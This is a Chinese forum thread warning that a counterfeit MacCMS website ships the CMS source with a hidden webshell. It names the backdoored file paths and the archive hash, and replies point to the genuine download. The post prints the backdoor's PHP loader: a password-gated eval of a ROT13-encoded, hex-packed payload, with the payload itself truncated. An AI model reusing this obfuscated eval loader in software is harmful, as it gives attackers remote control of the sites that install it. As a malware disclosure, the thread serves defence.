2. 站长交流
  3. 有用苹果自己看下

有用苹果自己看下

wunwun111 2020-1-29 1418

www.maccmsv10.com前者使用了一个和maccms官网一模一样的静态首页提供程序下载

该第三方站点下载了源码,至今依然存在后门,所以基本可确信是故意搭建的假冒官网。

后门文件路径

  1. u200bmaccms10extendupyunsrcUpyunApiFormat.php
  2. u200bmaccms10extendQcloudSmsSms.php

MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643

最后修改日期都是:2019/6/12

<?php

error_reporting(E_ERROR);

@ini_set(‘display_errors’,‘Off’);

@ini_set(‘max_execution_time’,20000);

@ini_set(‘memory_limit’,‘256M’);

header(“content-Type: text/html; charset=utf-8”);

$password = “0d41c75e2ab34a3740834cdd7e066d90”;

function s(){

$str = “66756r6374696s6r207374…………”; //大马

$str = str_rot13($str);

m($str);

}

function m($str){

global $password;

$jj = ”;

eval($jj.pack(‘H*’,$str).$jj);

}

s();

?>

MacCMS后门Webshell

登录后主界面



最新回复 (5)
  • zlg3755 2020-1-29
    0 2
    貌似搜不到正版官网了,源码该从哪里下?
  • wunwun111 2020-1-29
    0 3


    老王都说了,有那个仿会说这样,不信你去问玩苹果的

  • zlg3755 2020-1-29
    0 4
    不错,以后有机会学一下
    就是插件和模板不知道哪里的靠谱一点,网上乱七八糟也不敢随便用,怕有后门木马
  • wunwun111 2020-1-29
    0 5


    自己看


  • 大佬 2020-1-30
    0 6
    www.maccms.cn  就可以下载了,会自动跳转到  https://github.com/magicblack/maccms_down
返回
发新帖